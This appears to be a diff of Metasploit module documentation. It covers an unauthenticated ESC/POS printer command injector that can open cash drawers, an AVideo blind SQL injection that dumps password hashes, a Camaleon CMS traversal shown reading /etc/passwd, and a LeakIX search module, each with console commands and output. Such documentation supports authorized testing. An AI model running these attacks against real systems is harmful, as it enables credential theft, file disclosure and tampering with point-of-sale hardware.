||||
<capability>http://viptela.com/viptela-global?module=viptela-global&revision=2024-07-01</capability>
|
||||
<capability>http://viptela.com/vpn?module=viptela-vpn&revision=2024-07-01</capability>
|
||||
<capability>urn:ietf:params:xml:ns:netconf:base:1.0?module=ietf-netconf&revision=2011-06-01&features=confirmed-commit,candidate,rollback-on-error,validate,xpath,url</capability>
|
||||
<capability>urn:ietf:params:xml:ns:netconf:partial-lock:1.0?module=ietf-netconf-partial-lock&revision=2009-10-19</capability>
|
||||
<capability>urn:ietf:params:xml:ns:yang:iana-crypt-hash?module=iana-crypt-hash&revision=2014-08-06&features=crypt-hash-sha-512,crypt-hash-sha-256,crypt-hash-md5</capability>
|
||||
<capability>urn:ietf:params:xml:ns:yang:ietf-inet-types?module=ietf-inet-types&revision=2013-07-15</capability>
|
||||
<capability>urn:ietf:params:xml:ns:yang:ietf-netconf-acm?module=ietf-netconf-acm&revision=2018-02-14</capability>
|
||||
<capability>urn:ietf:params:xml:ns:yang:ietf-netconf-monitoring?module=ietf-netconf-monitoring&revision=2010-10-04</capability>
|
||||
<capability>urn:ietf:params:xml:ns:yang:ietf-netconf-notifications?module=ietf-netconf-notifications&revision=2012-02-06</capability>
|
||||
<capability>urn:ietf:params:xml:ns:yang:ietf-netconf-with-defaults?module=ietf-netconf-with-defaults&revision=2011-06-01</capability>
|
||||
<capability>urn:ietf:params:xml:ns:yang:ietf-restconf-monitoring?module=ietf-restconf-monitoring&revision=2017-01-26</capability>
|
||||
<capability>urn:ietf:params:xml:ns:yang:ietf-x509-cert-to-name?module=ietf-x509-cert-to-name&revision=2014-12-10</capability>
|
||||
<capability>urn:ietf:params:xml:ns:yang:ietf-yang-metadata?module=ietf-yang-metadata&revision=2016-08-05</capability>
|
||||
<capability>urn:ietf:params:xml:ns:yang:ietf-yang-smiv2?module=ietf-yang-smiv2&revision=2012-06-22</capability>
|
||||
<capability>urn:ietf:params:xml:ns:yang:ietf-yang-types?module=ietf-yang-types&revision=2013-07-15</capability>
|
||||
</capabilities>
|
||||
<session-id>25</session-id></hello>]]>]]>
|
||||
```
|
||||
@@ -0,0 +1,115 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module targets networked ESC/POS compatible printers that listen for raw commands on TCP port 9100.
|
||||
The vulnerability is a lack of authentication and access control on this port, allowing anyone with
|
||||
network access to send unauthenticated ESC/POS commands. The module exploits this by sending crafted
|
||||
command sequences to inject custom print jobs, trigger the cash drawer, or manipulate the paper feed,
|
||||
effectively taking control of the printer's physical functions.
|
||||
|
||||
|
||||
- **Printer Model:** Any Epson-compatible printer exposing the ESC/POS command set
|
||||
on TCP port 9100.
|
||||
|
||||
- **Protocol:** ESC/POS over TCP.
|
||||
|
||||
- **CVE:** CVE-2026-23767
|
||||
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
|
||||
|
||||
1. **Load the module:**
|
||||
use auxiliary/admin/printer/escpos_tcp_command_injector
|
||||
|
||||
2. **Set required options:**
|
||||
set RHOST <printer_ip>
|
||||
|
||||
3. **Choose an action:**
|
||||
Set the `ACTION` option to specify the desired behavior.
|
||||
- `PRINT`: Prints a custom text message.
|
||||
- `DRAWER`: Triggers the attached cash drawer.
|
||||
- `CUT`: Feeds lines and cuts the paper.
|
||||
|
||||
4. **Execute the module:**
|
||||
run
|
||||
|
||||
---
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
### MESSAGE
|
||||
|
||||
This option specifies the text to be sent to the printer.
|
||||
|
||||
* **Description:** The string of text you want the printer to output. It is only required when `ACTION` is set to `PRINT`.
|
||||
* **Default:** "PWNED"
|
||||
* **Example:** `set MESSAGE "Printing this now"`
|
||||
|
||||
### DRAWER_COUNT
|
||||
|
||||
This option specifies how many times to trigger the cash drawer signal.
|
||||
|
||||
* **Description:** The number of times to fire the open drawer command. Only used when `ACTION` is set to `DRAWER`.
|
||||
* **Default:** `1`
|
||||
* **Example:** `set DRAWER_COUNT 3`
|
||||
|
||||
### FEED_LINES
|
||||
|
||||
This option specifies how much paper to feed before cutting.
|
||||
|
||||
* **Description:** The number of lines to feed before executing the paper cut. Only used when `ACTION` is set to `CUT`.
|
||||
* **Default:** `5`
|
||||
* **Example:** `set FEED_LINES 10`
|
||||
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Example 1: Printing a Simple Message
|
||||
|
||||
This example shows how to use the module to send a simple text message to a network-connected ESC/POS printer.
|
||||
|
||||
msf6 > use auxiliary/admin/printer/escpos_tcp_command_injector
|
||||
msf6 auxiliary(admin/printer/escpos_tcp_command_injector) > set RHOSTS 192.168.1.200
|
||||
msf6 auxiliary(admin/printer/escpos_tcp_command_injector) > set ACTION PRINT
|
||||
msf6 auxiliary(admin/printer/escpos_tcp_command_injector) > set MESSAGE "Hello World"
|
||||
msf6 auxiliary(admin/printer/escpos_tcp_command_injector) > run
|
||||
|
||||
[*] Connected to printer at 192.168.1.200
|
||||
[+] Printed message: 'Hello World'
|
||||
|
||||
### Example 2: Triggering the Cash Drawer
|
||||
|
||||
This scenario demonstrates the use of the `DRAWER` action to send the specific
|
||||
ESC/POS command to open a cash drawer connected to the printer.
|
||||
|
||||
msf6 > use auxiliary/admin/printer/escpos_tcp_command_injector
|
||||
msf6 auxiliary(admin/printer/escpos_tcp_command_injector) > set RHOSTS 192.168.1.200
|
||||
msf6 auxiliary(admin/printer/escpos_tcp_command_injector) > set ACTION DRAWER
|
||||
msf6 auxiliary(admin/printer/escpos_tcp_command_injector) > run
|
||||
|
||||
[*] Connected to printer at 192.168.1.200
|
||||
[*] Triggering cash drawer 1 times...
|
||||
[+] Triggered cash drawer.
|
||||
|
||||
### Example 3: Cutting Paper
|
||||
|
||||
This example shows how to use the `CUT` action to feed paper and perform a full cut.
|
||||
|
||||
msf6 > use auxiliary/admin/printer/escpos_tcp_command_injector
|
||||
msf6 auxiliary(admin/printer/escpos_tcp_command_injector) > set RHOSTS 192.168.1.200
|
||||
msf6 auxiliary(admin/printer/escpos_tcp_command_injector) > set ACTION CUT
|
||||
msf6 auxiliary(admin/printer/escpos_tcp_command_injector) > set FEED_LINES 10
|
||||
msf6 auxiliary(admin/printer/escpos_tcp_command_injector) > run
|
||||
|
||||
[*] Connected to printer at 192.168.1.200
|
||||
[*] Feeding 10 lines and cutting paper...
|
||||
[+] Paper fed and cut.
|
||||
|
||||
|
||||
This module has been tested against a physical Epson-compatible receipt printer and
|
||||
verified to print custom messages and trigger the cash drawer.
|
||||
For additional device compatibility, refer to the ESC/POS protocol documentation.
|
||||
@@ -1,4 +1,4 @@
|
||||
PhoenixContact Programmable Logic Controllers are built are using a variant of
|
||||
PhoenixContact Programmable Logic Controllers are built using a variant of
|
||||
ProConOS. The communicate using a proprietary protocol over ports TCP/1962 and
|
||||
TCP/41100 or TCP/20547. This protocol allows a user to remotely determine the
|
||||
PLC type, firmware and build number on port TCP/1962. A user can also
|
||||
|
||||
@@ -3,7 +3,7 @@ This module will accept files from a live vCenter appliance or from a vCenter ap
|
||||
archive; either or both files can be supplied to the module depending on the situation. The module
|
||||
will extract the vCenter SSO IdP signing credential from the vmdir database, which can be used to
|
||||
create forged SAML assertions and access the SSO directory as an administrator. The vmafd service
|
||||
contains the vCenter certificate store which from which the module will attempt to extract all vmafd
|
||||
contains the vCenter certificate store, from which the module will attempt to extract all vmafd
|
||||
certificates that also have a corresponding private key. Portions of this module are based on
|
||||
information published by Zach Hanley at Horizon3:
|
||||
|
||||
|
||||
@@ -88,7 +88,7 @@ Default is `false`.
|
||||
|
||||
### PBKDF2-HMAC-SHA512
|
||||
|
||||
Crack SHA12 hashes. Default is `true`.
|
||||
Crack SHA512 hashes. Default is `true`.
|
||||
|
||||
### POT
|
||||
|
||||
|
||||
@@ -0,0 +1,148 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits an unauthenticated SQL injection vulnerability in AVideo's
|
||||
`videos.json.php` endpoint to extract user credentials (usernames and password hashes).
|
||||
|
||||
**CVE ID:** CVE-2026-28501
|
||||
|
||||
**Affected Versions:** AVideo <= 22.0. Fixed in 24.0.
|
||||
|
||||
### Vulnerability Overview
|
||||
|
||||
The `catName` parameter is injected unsanitized into SQL queries via the `getCatSQL()` function.
|
||||
A global security filter in `security.php` strips quotes from GET/POST parameters, but sending
|
||||
`catName` via a JSON request body bypasses this filter because the JSON input is parsed and
|
||||
merged into `$_REQUEST` after the security checks have already executed.
|
||||
|
||||
The module uses time-based blind SQL injection with `BENCHMARK()` to extract data.
|
||||
`SLEEP()` cannot be used because the application's `sqlDAL` layer uses prepared statements
|
||||
that prevent it, but `BENCHMARK()` works via a multiplication pattern that embeds the boolean
|
||||
condition as a multiplier on the iteration count.
|
||||
|
||||
### Setup
|
||||
|
||||
This lab reuses the same AVideo Docker environment as the `avideo_encoder_getimage_cmd_injection`
|
||||
module.
|
||||
|
||||
1. Clone the AVideo repository and checkout the vulnerable commit:
|
||||
|
||||
```bash
|
||||
cd /tmp
|
||||
git clone https://github.com/WWBN/AVideo.git
|
||||
cd AVideo
|
||||
git checkout 596df4e5b0597c9806da76ebec5bbe3b305953e4
|
||||
```
|
||||
|
||||
2. Create a `.env` file with the following configuration:
|
||||
|
||||
```bash
|
||||
cat > .env << EOF
|
||||
SERVER_NAME=localhost
|
||||
CREATE_TLS_CERTIFICATE=yes
|
||||
DB_MYSQL_HOST=database
|
||||
DB_MYSQL_PORT=3306
|
||||
DB_MYSQL_NAME=avideo
|
||||
DB_MYSQL_USER=avideo
|
||||
DB_MYSQL_PASSWORD=avideo
|
||||
HTTP_PORT=80
|
||||
HTTPS_PORT=9443
|
||||
NETWORK_SUBNET=172.99.0.0/16
|
||||
EOF
|
||||
```
|
||||
|
||||
3. Fix MariaDB corrupted tc.log issue (required for first-time setup):
|
||||
|
||||
```bash
|
||||
cat > deploy/docker-entrypoint-mariadb << 'SCRIPTEOF'
|
||||
#!/bin/bash
|
||||
set -e
|
||||
|
||||
if [ -f /var/lib/mysql/tc.log ]; then
|
||||
MAGIC_HEADER=$(head -c 4 /var/lib/mysql/tc.log | od -An -tx1 | tr -d ' \n' 2>/dev/null || echo "")
|
||||
if [ "$MAGIC_HEADER" != "01000000" ] && [ -n "$MAGIC_HEADER" ]; then
|
||||
echo "[Entrypoint]: Removing corrupted tc.log file (bad magic header: $MAGIC_HEADER)"
|
||||
rm -f /var/lib/mysql/tc.log
|
||||
fi
|
||||
fi
|
||||
SCRIPTEOF
|
||||
chmod +x deploy/docker-entrypoint-mariadb
|
||||
|
||||
cat >> Dockerfile.mariadb << 'DOCKERFILEEOF'
|
||||
|
||||
COPY deploy/docker-entrypoint-mariadb /usr/local/bin/docker-entrypoint-mariadb
|
||||
RUN chmod +x /usr/local/bin/docker-entrypoint-mariadb
|
||||
RUN sed -i '2i /usr/local/bin/docker-entrypoint-mariadb' /usr/local/bin/docker-entrypoint.sh
|
||||
DOCKERFILEEOF
|
||||
|
||||
docker compose build database database_encoder
|
||||
```
|
||||
|
||||
4. Start the Docker Compose environment:
|
||||
|
||||
```bash
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
5. Wait for the services to be ready and access the application at `http://localhost`.
|
||||
Complete the installation wizard if this is a first-time setup.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. `use auxiliary/gather/avideo_catname_sqli`
|
||||
3. `set RHOSTS <target_ip>`
|
||||
4. `set RPORT <target_port>` (default: 80)
|
||||
5. `run`
|
||||
6. **Verify** that user credentials are extracted and displayed
|
||||
|
||||
## Options
|
||||
|
||||
### COUNT
|
||||
|
||||
Number of users to dump. Default: 0 (all users).
|
||||
|
||||
### SqliDelay
|
||||
|
||||
Time delay threshold for blind injection (default: 1.0 second). Lower values are faster
|
||||
but may produce false positives on slow networks.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Credential dump against AVideo <= 22.0
|
||||
|
||||
```
|
||||
msf > use auxiliary/gather/avideo_catname_sqli
|
||||
msf auxiliary(gather/avideo_catname_sqli) > set RHOSTS localhost
|
||||
RHOSTS => localhost
|
||||
msf auxiliary(gather/avideo_catname_sqli) > set RPORT 80
|
||||
RPORT => 80
|
||||
msf auxiliary(gather/avideo_catname_sqli) > set COUNT 1
|
||||
COUNT => 1
|
||||
msf auxiliary(gather/avideo_catname_sqli) > run
|
||||
[*] Running module against 127.0.0.1
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] {SQLi} Calibrating BENCHMARK iterations for 1.0s delay...
|
||||
[*] {SQLi} Probe: 1000000 iterations took 0.127s
|
||||
[*] {SQLi} Calibrated: 23622047 iterations for ~1.0s delay
|
||||
[+] The target is vulnerable. Time-based blind SQLi confirmed via BENCHMARK()
|
||||
[*] Dumping user credentials from the users table...
|
||||
[!] Time-based blind extraction is slow (~4s per character). Be patient.
|
||||
[*] {SQLi} [char 1/38] = "a"
|
||||
[*] {SQLi} [char 2/38] = "d"
|
||||
[*] {SQLi} [char 3/38] = "m"
|
||||
[*] {SQLi} [char 4/38] = "i"
|
||||
[*] {SQLi} [char 5/38] = "n"
|
||||
[*] {SQLi} [char 6/38] = ";"
|
||||
[*] {SQLi} [char 7/38] = "5"
|
||||
...
|
||||
[*] {SQLi} [char 38/38] = "9"
|
||||
AVideo Users
|
||||
============
|
||||
|
||||
user password
|
||||
---- --------
|
||||
admin 5f4dcc3b5aa765d61d8327deb882cf99
|
||||
|
||||
[+] Loot saved to: /home/user/.msf4/loot/20260306_default_127.0.0.1_avideo.users_123456.txt
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
@@ -0,0 +1,216 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module attempts to read files from an authenticated directory traversal vuln in Camaleon CMS versions <= 2.8.0 and version 2.9.0.
|
||||
|
||||
CVE-2024-46987 mistakenly indicates that versions 2.8.1 and 2.8.2 are also vulnerable, however this is not the case.
|
||||
|
||||
## Setup
|
||||
|
||||
See [Camaleon CMS](https://github.com/owen2345/camaleon-cms) documentation.
|
||||
|
||||
The following describes how to setup Camaleon CMS version 2.8.0 on Ubuntu.
|
||||
|
||||
### Requirements
|
||||
|
||||
- Rails 6.1+
|
||||
- PostgreSQL, MySQL 5+ or SQlite
|
||||
- Ruby 3.0+
|
||||
- Imagemagick
|
||||
|
||||
### Install Ruby
|
||||
|
||||
guides.rubyonrails.org/install_ruby_on_rails.html
|
||||
|
||||
~~~bash
|
||||
sudo apt install build-essential rustc libssl-dev libyaml-dev zlib1g-dev libgmp-dev git curl
|
||||
~~~
|
||||
|
||||
### Install Mise
|
||||
|
||||
~~~bash
|
||||
curl https://mise.run | sh
|
||||
echo "eval \"\$(~/.local/bin/mise activate)\"" >> ~/.bashrc
|
||||
source ~/.bashrc
|
||||
~~~
|
||||
|
||||
### Install Ruby with Mise
|
||||
|
||||
~~~bash
|
||||
$ mise use -g ruby@3.0
|
||||
|
||||
$ ruby --version
|
||||
ruby 3.0.7p220 ...
|
||||
~~~
|
||||
|
||||
### Install Imagemagick
|
||||
|
||||
~~~bash
|
||||
sudo apt install --no-install-recommends imagemagick
|
||||
~~~
|
||||
|
||||
### Install Postgresql
|
||||
|
||||
~~~bash
|
||||
sudo apt install postgresql
|
||||
~~~
|
||||
|
||||
### Install Rails
|
||||
|
||||
~~~bash
|
||||
$ gem install rails -v 6.1
|
||||
~~~
|
||||
|
||||
#### concurrent-ruby Issue
|
||||
|
||||
Downgrade concurrent-ruby to 1.3.4
|
||||
|
||||
~~~bash
|
||||
$ gem list concurrent-ruby
|
||||
concurrent-ruby (1.3.6)
|
||||
|
||||
$ gem install concurrent-ruby -v 1.3.4
|
||||
$ gem uninstall concurrent-ruby -v 1.3.6
|
||||
|
||||
$ rails --version
|
||||
Rails 6.1.7.10
|
||||
~~~
|
||||
|
||||
### Create Rails Project
|
||||
|
||||
Run `rails new camaleon_project`
|
||||
|
||||
### Gemfile
|
||||
|
||||
In your Gemfile do the following:
|
||||
|
||||
Replace `gem 'spring'` with `gem 'spring', '4.2.1'`
|
||||
|
||||
|
||||
Delete this line to prevent [conflict](https://github.com/owen2345/camaleon-cms/issues/1111): `gem 'sass-rails', '>= 6'`
|
||||
|
||||
Put these lines at the bottom of your Gemfile:
|
||||
|
||||
~~~
|
||||
gem 'camaleon_cms', '2.8.0'
|
||||
gem 'concurrent-ruby', '1.3.4'
|
||||
~~~
|
||||
|
||||
### Install Bundle
|
||||
|
||||
From the project directory run `bundle install`
|
||||
|
||||
### Webpacker.yml Issue
|
||||
|
||||
~~~bash
|
||||
wget -O camaleon_project/config/webpacker.yml https://raw.githubusercontent.com/rails/webpacker/master/lib/install/config/webpacker.yml
|
||||
~~~
|
||||
|
||||
### Camaleon CMS Installation
|
||||
|
||||
~~~bash
|
||||
rails generate camaleon_cms:install
|
||||
rake camaleon_cms:generate_migrations
|
||||
rake db:migrate
|
||||
~~~
|
||||
|
||||
### Run Rails
|
||||
|
||||
~~~bash
|
||||
bundle exec rails server -b 0.0.0.0
|
||||
~~~
|
||||
|
||||
Navigate to `http://{ip address}:3000` and enter test under the Name field.
|
||||
|
||||
### Setup Server
|
||||
|
||||
When prompted with the new installation page just enter "test" into the Name field and continue.
|
||||
|
||||
#### Create Unprivileged User (Optional)
|
||||
|
||||
Navigate to `http://{ip address}:3000/admin` - login with the default admin credentials "admin:admin123"
|
||||
|
||||
Then navigate to "Users -> + Add User" and fill out the form.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: `use auxiliary/gather/camaleon_download_private_file`
|
||||
2. Do: `set RHOST [IP]`
|
||||
3. Do: `run`
|
||||
|
||||
## Options
|
||||
|
||||
### FILEPATH
|
||||
|
||||
The filepath of the file to read.
|
||||
|
||||
### DEPTH
|
||||
|
||||
The number of "../" appended to the filename. Default is 13
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf > use auxiliary/gather/camaleon_download_private_file
|
||||
msf auxiliary(gather/camaleon_download_private_file) > set rhost 10.0.0.45
|
||||
rhost => 10.0.0.45
|
||||
msf auxiliary(gather/camaleon_download_private_file) > set rport 3000
|
||||
rport => 3000
|
||||
msf auxiliary(gather/camaleon_download_private_file) > set ssl false
|
||||
ssl => false
|
||||
msf auxiliary(gather/camaleon_download_private_file) > run
|
||||
[*] Running module against 10.0.0.45
|
||||
[+] /etc/passwd stored as '/home/kali/.msf4/loot/20260411192711_default_10.0.0.45_camaleon.travers_926890.txt'
|
||||
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
||||
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
||||
sync:x:4:65534:sync:/bin:/bin/sync
|
||||
games:x:5:60:games:/usr/games:/usr/sbin/nologin
|
||||
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
|
||||
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
|
||||
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
|
||||
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
|
||||
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
|
||||
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
|
||||
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
|
||||
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
|
||||
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
|
||||
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
|
||||
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
|
||||
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
|
||||
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
|
||||
systemd-timesync:x:996:996:systemd Time Synchronization:/:/usr/sbin/nologin
|
||||
dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false
|
||||
messagebus:x:101:101::/nonexistent:/usr/sbin/nologin
|
||||
syslog:x:102:102::/nonexistent:/usr/sbin/nologin
|
||||
systemd-resolve:x:991:991:systemd Resolver:/:/usr/sbin/nologin
|
||||
uuidd:x:103:103::/run/uuidd:/usr/sbin/nologin
|
||||
usbmux:x:104:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
|
||||
tss:x:105:105:TPM software stack,,,:/var/lib/tpm:/bin/false
|
||||
systemd-oom:x:990:990:systemd Userspace OOM Killer:/:/usr/sbin/nologin
|
||||
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
|
||||
whoopsie:x:107:109::/nonexistent:/bin/false
|
||||
dnsmasq:x:999:65534:dnsmasq:/var/lib/misc:/usr/sbin/nologin
|
||||
avahi:x:108:111:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
|
||||
tcpdump:x:109:112::/nonexistent:/usr/sbin/nologin
|
||||
sssd:x:110:113:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
|
||||
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
|
||||
cups-pk-helper:x:112:114:user for cups-pk-helper service,,,:/nonexistent:/usr/sbin/nologin
|
||||
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
|
||||
saned:x:113:116::/var/lib/saned:/usr/sbin/nologin
|
||||
geoclue:x:114:117::/var/lib/geoclue:/usr/sbin/nologin
|
||||
cups-browsed:x:115:114::/nonexistent:/usr/sbin/nologin
|
||||
hplip:x:116:7:HPLIP system user,,,:/run/hplip:/bin/false
|
||||
gnome-remote-desktop:x:988:988:GNOME Remote Desktop:/var/lib/gnome-remote-desktop:/usr/sbin/nologin
|
||||
polkitd:x:987:987:User for polkitd:/:/usr/sbin/nologin
|
||||
rtkit:x:117:119:RealtimeKit,,,:/proc:/usr/sbin/nologin
|
||||
colord:x:118:120:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
|
||||
gnome-initial-setup:x:119:65534::/run/gnome-initial-setup/:/bin/false
|
||||
gdm:x:120:121:Gnome Display Manager:/var/lib/gdm3:/bin/false
|
||||
nm-openvpn:x:121:122:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
|
||||
bittman:x:1000:1000:bittman:/home/bittman:/bin/bash
|
||||
postgres:x:122:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
|
||||
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
@@ -78,6 +78,12 @@ Used only when the `RUN_SINGLE_QUERY` action is used. Should be a comma separate
|
||||
of attributes to display from the full result set for each entry that was returned by the
|
||||
target LDAP server. Used to filter the results down to manageable sets of data.
|
||||
|
||||
### LDAP::QuerySacl
|
||||
Query the SACL on security descriptors. If the authenticated user does not have permission
|
||||
to view the SACL, the entire security descriptor will be omitted by the server. Setting
|
||||
this to false enables the other fields of the security descriptor to be viewed when those
|
||||
permissions are not present. Only applicable for Active Directory LDAP servers.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### RUN_SINGLE_QUERY with Table Output
|
||||
|
||||
@@ -0,0 +1,255 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module uses the [LeakIX](https://leakix.net) API to search for exposed services
|
||||
and data leaks across the internet. LeakIX indexes internet-facing services and leaked
|
||||
credentials/databases, similar to Shodan or Censys but with a focus on data leaks.
|
||||
|
||||
An API key is required. Free keys are available at [https://leakix.net](https://leakix.net).
|
||||
Pro keys unlock the BULK streaming action and higher page limits.
|
||||
|
||||
The module supports six actions:
|
||||
|
||||
- **SEARCH** - Query LeakIX with a search string (leak or service scope). Paginated, 20 results per page, max 500 pages.
|
||||
- **HOST** - Retrieve all known services and leaks for a specific IP address.
|
||||
- **DOMAIN** - Retrieve all known services and leaks for a specific domain.
|
||||
- **SUBDOMAINS** - Enumerate known subdomains for a domain.
|
||||
- **PLUGINS** - List all available LeakIX scanner plugins (useful for building queries).
|
||||
- **BULK** - Stream all leak results via the bulk NDJSON API (Pro only, leak scope only).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: `use auxiliary/gather/leakix_search`
|
||||
1. Do: `set LEAKIX_APIKEY <your-api-key>`
|
||||
1. Do: `set QUERY +country:"France" +port:3306`
|
||||
1. Do: `run`
|
||||
1. Verify that results are returned in a table with IP, port, protocol, host, country, organization, software, type, and source columns.
|
||||
|
||||
## Options
|
||||
|
||||
### LEAKIX_APIKEY
|
||||
|
||||
The LeakIX API key. Required for all actions. Free keys are available at [https://leakix.net](https://leakix.net).
|
||||
|
||||
### QUERY
|
||||
|
||||
The search query string. Required for SEARCH and BULK actions. Uses LeakIX query syntax:
|
||||
|
||||
- `+country:"France"` - filter by country
|
||||
- `+port:3306` - filter by port
|
||||
- `plugin:HttpOpenProxy` - filter by plugin name
|
||||
- `+software.name:"nginx" +country:"US"` - combine filters
|
||||
|
||||
### SCOPE
|
||||
|
||||
Search scope: `leak` or `service`. Default is `leak`. The BULK action only supports `leak` scope.
|
||||
|
||||
### MAXPAGE
|
||||
|
||||
Maximum number of pages to collect for SEARCH (1-500, 20 results per page). Default is 1. The API enforces a hard limit of 500 pages regardless of plan.
|
||||
|
||||
### MAXRESULTS
|
||||
|
||||
Stop collecting after this many results. Works with SEARCH and BULK. Set to 0 (default) for unlimited.
|
||||
|
||||
### TARGET_IP
|
||||
|
||||
Target IP address for the HOST action.
|
||||
|
||||
### TARGET_DOMAIN
|
||||
|
||||
Target domain for the DOMAIN and SUBDOMAINS actions.
|
||||
|
||||
### OUTFILE
|
||||
|
||||
Path to save the results table output.
|
||||
|
||||
### DATABASE
|
||||
|
||||
Set to `true` to add discovered hosts and services to the Metasploit database.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### SEARCH - Find exposed MySQL servers in France
|
||||
|
||||
```
|
||||
msf6 > use auxiliary/gather/leakix_search
|
||||
msf6 auxiliary(gather/leakix_search) > set LEAKIX_APIKEY <redacted>
|
||||
LEAKIX_APIKEY => <redacted>
|
||||
msf6 auxiliary(gather/leakix_search) > set QUERY +country:"France" +port:3306
|
||||
QUERY => +country:"France" +port:3306
|
||||
msf6 auxiliary(gather/leakix_search) > set SCOPE service
|
||||
SCOPE => service
|
||||
msf6 auxiliary(gather/leakix_search) > run
|
||||
|
||||
[*] Fetching page 1/1...
|
||||
[+] Got 20 results from page 1 (total: 20)
|
||||
[*] Total: 20 results
|
||||
|
||||
LeakIX Results
|
||||
==============
|
||||
|
||||
IP:Port Protocol Host Country Organization Software Type Source
|
||||
------ -------- ---- ------- ------------ -------- ---- ------
|
||||
x.x.x.x:3306 mysql db.example.com France OVH SAS MySQL 5.7 service MysqlOpenPlugin
|
||||
x.x.x.x:3306 mysql server2.example.fr France Online S.A.S. MySQL 8.0 service MysqlOpenPlugin
|
||||
...
|
||||
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
### HOST - Lookup a specific IP
|
||||
|
||||
```
|
||||
msf6 auxiliary(gather/leakix_search) > set ACTION HOST
|
||||
ACTION => HOST
|
||||
msf6 auxiliary(gather/leakix_search) > set TARGET_IP 1.2.3.4
|
||||
TARGET_IP => 1.2.3.4
|
||||
msf6 auxiliary(gather/leakix_search) > run
|
||||
|
||||
[*] Fetching host details for 1.2.3.4...
|
||||
[*] 1.2.3.4: 3 results
|
||||
|
||||
LeakIX Results
|
||||
==============
|
||||
|
||||
IP:Port Protocol Host Country Organization Software Type Source
|
||||
------ -------- ---- ------- ------------ -------- ---- ------
|
||||
1.2.3.4:22 ssh host.example United States Example Inc OpenSSH 8 service SshOpenPlugin
|
||||
1.2.3.4:80 http host.example United States Example Inc nginx 1.18 service HttpOpenPlugin
|
||||
1.2.3.4:443 https host.example United States Example Inc nginx 1.18 service HttpOpenPlugin
|
||||
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
### DOMAIN - Lookup a specific domain
|
||||
|
||||
```
|
||||
msf6 auxiliary(gather/leakix_search) > set ACTION DOMAIN
|
||||
ACTION => DOMAIN
|
||||
msf6 auxiliary(gather/leakix_search) > set TARGET_DOMAIN example.com
|
||||
TARGET_DOMAIN => example.com
|
||||
msf6 auxiliary(gather/leakix_search) > run
|
||||
|
||||
[*] Fetching domain details for example.com...
|
||||
[*] example.com: 5 results
|
||||
|
||||
LeakIX Results
|
||||
==============
|
||||
|
||||
IP:Port Protocol Host Country Organization Software Type Source
|
||||
------ -------- ---- ------- ------------ -------- ---- ------
|
||||
x.x.x.x:443 https www.example.com United States Example Inc nginx 1.21 service HttpOpenPlugin
|
||||
x.x.x.x:22 ssh mail.example.com United States Example Inc OpenSSH 8.4 service SshOpenPlugin
|
||||
...
|
||||
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
### SUBDOMAINS - Enumerate subdomains
|
||||
|
||||
```
|
||||
msf6 auxiliary(gather/leakix_search) > set ACTION SUBDOMAINS
|
||||
ACTION => SUBDOMAINS
|
||||
msf6 auxiliary(gather/leakix_search) > set TARGET_DOMAIN example.com
|
||||
TARGET_DOMAIN => example.com
|
||||
msf6 auxiliary(gather/leakix_search) > run
|
||||
|
||||
[*] Fetching subdomains for example.com...
|
||||
[*] Found 12 subdomains
|
||||
|
||||
Subdomains for example.com
|
||||
===========================
|
||||
|
||||
Subdomain Distinct IPs Last Seen
|
||||
--------- ------------ ---------
|
||||
www.example.com 2 2025-01-15T10:30:00Z
|
||||
mail.example.com 1 2025-01-14T08:22:00Z
|
||||
api.example.com 3 2025-01-15T12:00:00Z
|
||||
dev.example.com 1 2025-01-10T06:15:00Z
|
||||
...
|
||||
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
